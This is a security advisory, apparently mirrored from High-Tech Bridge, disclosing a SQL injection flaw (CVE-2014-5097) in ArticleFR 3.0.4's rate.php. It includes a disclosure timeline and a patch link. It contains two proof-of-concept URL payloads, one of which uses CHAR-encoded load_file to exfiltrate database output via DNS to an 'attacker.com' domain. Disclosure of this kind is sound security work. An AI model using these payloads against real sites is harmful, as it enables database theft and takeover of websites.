Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31031
HistoryAug 26, 2014 - 12:00 a.m.

SQL Injection Vulnerability in ArticleFR

2014-08-2600:00:00
vulners.com
45

Advisory ID: HTB23225
Product: ArticleFR
Vendor: Free Reprintables
Vulnerable Version(s): 3.0.4 and probably prior
Tested Version: 3.0.4
Advisory Publication: July 23, 2014 [without technical details]
Vendor Notification: July 23, 2014
Public Disclosure: August 20, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-5097
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.

1) SQL Injection in ArticleFR: CVE-2014-5097

The vulnerability exists due to insufficient sanitization of the "id" HTTP GET parameter passed to "/rate.php" script, when "act" HTTP GET parameter is set to either "get" or "set". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in application’s database.

The following exploitation example demonstrates vulnerability when "act" HTTP GET parameter is set to value "get". The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20–%202

Below is another exploitation example, which displays version of MySQL server when "act" HTTP GET parameter is set to value "set":

http://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20–%202


Solution:

Disclosure timeline:
2014-07-23 Vendor Alerted via emails.
2014-07-31 Vendor Alerted via emails.
2014-07-31 Issue created on GitHub.
2014-08-04 Vendor closed issue on GitHub.
2014-08-04 Vendor locked and limited conversation to collaborators on GitHub.
2014-08-07 Fix Requested via emails.
2014-08-11 Fix Requested via emails.
2014-08-18 Fix Requested via emails.
2014-08-20 Public disclosure with self-written patch.

Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23225-patch.zip


References:

[1] High-Tech Bridge Advisory HTB23225 - https://www.htbridge.com/advisory/HTB23225 - SQL Injection Vulnerability in ArticleFR in ArticleFR.
[2] ArticleFR - http://freereprintables.com/ - Free Article Directory CMS System .
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Related for SECURITYVULNS:DOC:31031